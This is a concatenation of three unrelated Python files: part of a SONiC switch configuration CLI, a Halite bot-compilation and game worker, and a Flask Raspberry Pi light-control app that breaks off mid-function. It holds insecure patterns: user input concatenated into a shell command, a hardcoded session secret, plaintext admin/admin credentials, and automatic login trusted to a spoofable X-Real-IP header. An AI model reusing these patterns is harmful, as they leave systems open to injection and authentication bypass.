try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
#
# 'watermark' group ('config watermark telemetry interval')
#
@config.group(cls=clicommon.AbbreviationGroup)
def watermark():
"""Configure watermark """
pass
@watermark.group(cls=clicommon.AbbreviationGroup)
def telemetry():
"""Configure watermark telemetry"""
pass
@telemetry.command()
@click.argument('interval', required=True)
def interval(interval):
"""Configure watermark telemetry interval"""
command = 'watermarkcfg --config-interval ' + interval
clicommon.run_command(command)
#
# 'interface_naming_mode' subgroup ('config interface_naming_mode ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='interface_naming_mode')
def interface_naming_mode():
"""Modify interface naming mode for interacting with SONiC CLI"""
pass
@interface_naming_mode.command('default')
def naming_mode_default():
"""Set CLI interface naming mode to DEFAULT (SONiC port name)"""
set_interface_naming_mode('default')
@interface_naming_mode.command('alias')
def naming_mode_alias():
"""Set CLI interface naming mode to ALIAS (Vendor port alias)"""
set_interface_naming_mode('alias')
def is_loopback_name_valid(loopback_name):
"""Loopback name validation
"""
if loopback_name[:CFG_LOOPBACK_PREFIX_LEN] != CFG_LOOPBACK_PREFIX :
return False
if (loopback_name[CFG_LOOPBACK_PREFIX_LEN:].isdigit() is False or
int(loopback_name[CFG_LOOPBACK_PREFIX_LEN:]) > CFG_LOOPBACK_ID_MAX_VAL) :
return False
if len(loopback_name) > CFG_LOOPBACK_NAME_TOTAL_LEN_MAX:
return False
return True
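# Quick illustration (hypothetical values, assuming CFG_LOOPBACK_PREFIX is "Loopback"):
#   is_loopback_name_valid("Loopback0")   -> True
#   is_loopback_name_valid("Loopback999") -> True (if within CFG_LOOPBACK_ID_MAX_VAL)
#   is_loopback_name_valid("Lo0")         -> False (wrong prefix)
#   is_loopback_name_valid("LoopbackX")   -> False (suffix is not a number)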
#
# 'loopback' group ('config loopback ...')
#
@config.group()
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def loopback(ctx, redis_unix_socket_path):
"""Loopback-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
ctx.obj = {'db': config_db}
@loopback.command('add')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def add_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_intfs = [k for k,v in config_db.get_table('LOOPBACK_INTERFACE').iteritems() if type(k) != tuple]
if loopback_name in lo_intfs:
ctx.fail("{} already exists".format(loopback_name))
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, {"NULL" : "NULL"})
@loopback.command('del')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def del_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_config_db = config_db.get_table('LOOPBACK_INTERFACE')
lo_intfs = [k for k,v in lo_config_db.iteritems() if type(k) != tuple]
if loopback_name not in lo_intfs:
ctx.fail("{} does not exists".format(loopback_name))
ips = [ k[1] for k in lo_config_db if type(k) == tuple and k[0] == loopback_name ]
for ip in ips:
config_db.set_entry('LOOPBACK_INTERFACE', (loopback_name, ip), None)
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, None)
@config.group(cls=clicommon.AbbreviationGroup)
def ztp():
""" Configure Zero Touch Provisioning """
if os.path.isfile('/usr/bin/ztp') is False:
exit("ZTP feature unavailable in this image version")
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='ZTP will be restarted. You may lose switch data and connectivity, continue?')
@click.argument('run', required=False, type=click.Choice(["run"]))
def run(run):
"""Restart ZTP of the device."""
command = "ztp run -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Active ZTP session will be stopped and disabled, continue?')
@click.argument('disable', required=False, type=click.Choice(["disable"]))
def disable(disable):
"""Administratively Disable ZTP."""
command = "ztp disable -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.argument('enable', required=False, type=click.Choice(["enable"]))
def enable(enable):
"""Administratively Enable ZTP."""
command = "ztp enable"
clicommon.run_command(command, display_cmd=True)
#
# 'syslog' group ('config syslog ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='syslog')
@click.pass_context
def syslog_group(ctx):
"""Syslog server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@syslog_group.command('add')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def add_syslog_server(ctx, syslog_ip_address):
""" Add syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
click.echo("Syslog server {} is already configured".format(syslog_ip_address))
return
else:
db.set_entry('SYSLOG_SERVER', syslog_ip_address, {'NULL': 'NULL'})
click.echo("Syslog server {} added to configuration".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
@syslog_group.command('del')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def del_syslog_server(ctx, syslog_ip_address):
""" Delete syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
db.set_entry('SYSLOG_SERVER', '{}'.format(syslog_ip_address), None)
click.echo("Syslog server {} removed from configuration".format(syslog_ip_address))
else:
ctx.fail("Syslog server {} is not configured.".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
#
# 'ntp' group ('config ntp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ntp(ctx):
"""NTP server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@ntp.command('add')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def add_ntp_server(ctx, ntp_ip_address):
""" Add NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
click.echo("NTP server {} is already configured".format(ntp_ip_address))
return
else:
db.set_entry('NTP_SERVER', ntp_ip_address, {'NULL': 'NULL'})
click.echo("NTP server {} added to configuration".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
@ntp.command('del')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def del_ntp_server(ctx, ntp_ip_address):
""" Delete NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
db.set_entry('NTP_SERVER', '{}'.format(ntp_ip_address), None)
click.echo("NTP server {} removed from configuration".format(ntp_ip_address))
else:
ctx.fail("NTP server {} is not configured.".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
#
# 'sflow' group ('config sflow ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def sflow(ctx):
"""sFlow-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
#
# 'sflow' command ('config sflow enable')
#
@sflow.command()
@click.pass_context
def enable(ctx):
"""Enable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'up'}}
else:
sflow_tbl['global']['admin_state'] = 'up'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
try:
proc = subprocess.Popen("systemctl is-active sflow", shell=True, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
except SystemExit as e:
ctx.fail("Unable to check sflow status {}".format(e))
if out != "active":
log.log_info("sflow service is not enabled. Starting sflow docker...")
clicommon.run_command("sudo systemctl enable sflow")
clicommon.run_command("sudo systemctl start sflow")
#
# 'sflow' command ('config sflow disable')
#
@sflow.command()
@click.pass_context
def disable(ctx):
"""Disable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
else:
sflow_tbl['global']['admin_state'] = 'down'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow polling-interval ...')
#
@sflow.command('polling-interval')
@click.argument('interval', metavar='<polling_interval>', required=True,
type=int)
@click.pass_context
def polling_int(ctx, interval):
"""Set polling-interval for counter-sampling (0 to disable)"""
if interval not in range(5, 301) and interval != 0:
    click.echo("Polling interval must be between 5-300 (0 to disable)")
    return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
sflow_tbl['global']['polling_interval'] = interval
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
def is_valid_sample_rate(rate):
return rate in range(256, 8388608 + 1)
#
# 'sflow interface' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def interface(ctx):
"""Configure sFlow settings for an interface"""
pass
#
# 'sflow' command ('config sflow interface enable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def enable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict.keys():
intf_dict[ifname]['admin_state'] = 'up'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'admin_state': 'up'})
#
# 'sflow' command ('config sflow interface disable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def disable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict.keys():
intf_dict[ifname]['admin_state'] = 'down'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname,
{'admin_state': 'down'})
#
# 'sflow' command ('config sflow interface sample-rate ...')
#
@interface.command('sample-rate')
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.argument('rate', metavar='<sample_rate>', required=True, type=int)
@click.pass_context
def sample_rate(ctx, ifname, rate):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo('Invalid interface name')
return
if not is_valid_sample_rate(rate):
click.echo('Error: Sample rate must be between 256 and 8388608')
return
sess_dict = config_db.get_table('SFLOW_SESSION')
if sess_dict and ifname in sess_dict.keys():
sess_dict[ifname]['sample_rate'] = rate
config_db.mod_entry('SFLOW_SESSION', ifname, sess_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'sample_rate': rate})
#
# 'sflow collector' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def collector(ctx):
"""Add/Delete a sFlow collector"""
pass
def is_valid_collector_info(name, ip, port):
if len(name) > 16:
click.echo("Collector name must not exceed 16 characters")
return False
if port not in range(0, 65535 + 1):
click.echo("Collector port number must be between 0 and 65535")
return False
if not clicommon.is_ipaddress(ip):
click.echo("Invalid IP address")
return False
return True
#
# 'sflow' command ('config sflow collector add ...')
#
@collector.command()
@click.option('--port', required=False, type=int, default=6343,
help='Collector port number')
@click.argument('name', metavar='<collector_name>', required=True)
@click.argument('ipaddr', metavar='<IPv4/v6_address>', required=True)
@click.pass_context
def add(ctx, name, ipaddr, port):
"""Add a sFlow collector"""
ipaddr = ipaddr.lower()
if not is_valid_collector_info(name, ipaddr, port):
return
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if (collector_tbl and name not in collector_tbl.keys() and len(collector_tbl) == 2):
click.echo("Only 2 collectors can be configured, please delete one")
return
config_db.mod_entry('SFLOW_COLLECTOR', name,
{"collector_ip": ipaddr, "collector_port": port})
return
#
# 'sflow' command ('config sflow collector del ...')
#
@collector.command('del')
@click.argument('name', metavar='<collector_name>', required=True)
@click.pass_context
def del_collector(ctx, name):
"""Delete a sFlow collector"""
config_db = ctx.obj['db']
collector_tbl = config_db.get_table('SFLOW_COLLECTOR')
if name not in collector_tbl.keys():
click.echo("Collector: {} not configured".format(name))
return
config_db.mod_entry('SFLOW_COLLECTOR', name, None)
#
# 'sflow agent-id' group
#
@sflow.group(cls=clicommon.AbbreviationGroup, name='agent-id')
@click.pass_context
def agent_id(ctx):
"""Add/Delete a sFlow agent"""
pass
#
# 'sflow' command ('config sflow agent-id add ...')
#
@agent_id.command()
@click.argument('ifname', metavar='<interface_name>', required=True)
@click.pass_context
def add(ctx, ifname):
"""Add sFlow agent information"""
if ifname not in netifaces.interfaces():
click.echo("Invalid interface name")
return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' in sflow_tbl['global'].keys():
click.echo("Agent already configured. Please delete it first.")
return
sflow_tbl['global']['agent_id'] = ifname
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow agent-id del')
#
@agent_id.command('del')
@click.pass_context
def delete(ctx):
"""Delete sFlow agent information"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
if 'agent_id' not in sflow_tbl['global'].keys():
click.echo("sFlow agent not configured.")
return
sflow_tbl['global'].pop('agent_id')
config_db.set_entry('SFLOW', 'global', sflow_tbl['global'])
if __name__ == '__main__':
config()
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory
give_ownership(temp_dir, "bots", 0o774)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except:
logging.debug("Bot did not upload\n")
traceback.print_exc()
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
compile_dir = bot_dir + '_compile'
# Initialize errors up front so the except block below can safely extend it
errors = []
try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
print(e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 775 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2775)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
print(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
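# Sketch of the game-output JSON shape that parseGameOutput() expects (field values are
# hypothetical; only the keys actually read above -- "stats", "error_logs", "terminated" --
# and "replay", used later by executeGameTask(), are assumed):
#
#   {
#     "stats": {"0": {"rank": 1}, "1": {"rank": 2}},
#     "error_logs": {"1": "errorlog-1.log"},
#     "terminated": {"1": true},
#     "replay": "replay-xyz.hlt"
#   }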
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
Light_Control_GPIO.py
|
from flask import Flask, g, render_template, request, session, url_for, redirect
import time
import datetime
import threading
import csv
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
# GPIO 0 to 11 in output mode, initialized to LOW
for i in range(12):
GPIO.setup(i, GPIO.OUT, initial=GPIO.LOW)
app = Flask(__name__)
app.secret_key = 'somesecretkeythatonlyishouldknow'
app.session_cookie_name = 'MyBeautifulCookies'
authorize_ip = ["localhost", "127.0.0.1", "172.16.32.199"]
buttonSts_p1 = ["/static/img/img_off.png"] * 8
buttonSts_p2 = ["/static/img/img_off.png"] * 8
color = ["#333333"] * 8
warning = ""
class User:
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __repr__(self):
return f'<User: {self.username}>'
users = []
users.append(User(id=1, username='elo', password='elo'))
users.append(User(id=2, username='admin', password='admin'))
def gpio_modif():
for i in range(8):
if buttonSts_p1[i] == "/static/img/img_off.png":
#OFF
GPIO.output(i, 0)
else:
#ON
GPIO.output(i, 1)
def getTime():
t = time.localtime()
current_time = time.strftime("%H:%M", t)
return current_time
@app.before_request
def before_request():
g.user = None
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
for i in authorize_ip:
if ip == i:
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
else :
users.append(User(id=3, username='local', password='local'))
user = [x for x in users if x.id == 3][0]
session['user_id'] = user.id
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
return redirect(url_for('page1'))
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
@app.route("/", methods=['POST', 'GET'])
def login():
current_time = getTime()
if request.method == 'POST':
session.pop('user_id', None)
username = request.form['username']
password = request.form['password']
try:
user = [x for x in users if x.username == username][0]
try:
if user and user.password == password:
session['user_id'] = user.id
return redirect(url_for('page1'))
except:
return redirect(url_for('login'))
except:
return redirect(url_for('login'))
return render_template("login.html", time=current_time, warning=warning)
@app.route("/page1", methods = ['POST', 'GET'])
def page1():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if all(elem == "/static/img/img_on.png" for elem in buttonSts_p1):
buttonSts_p2[0] = "/static/img/img_on.png"
else:
buttonSts_p2[0] = "/static/img/img_off.png"
if request.method == 'POST':
        choice = request.form['button_p1']
        if choice in [str(n) for n in range(1, 9)]:
            # Toggle the selected channel: swap the button image and the
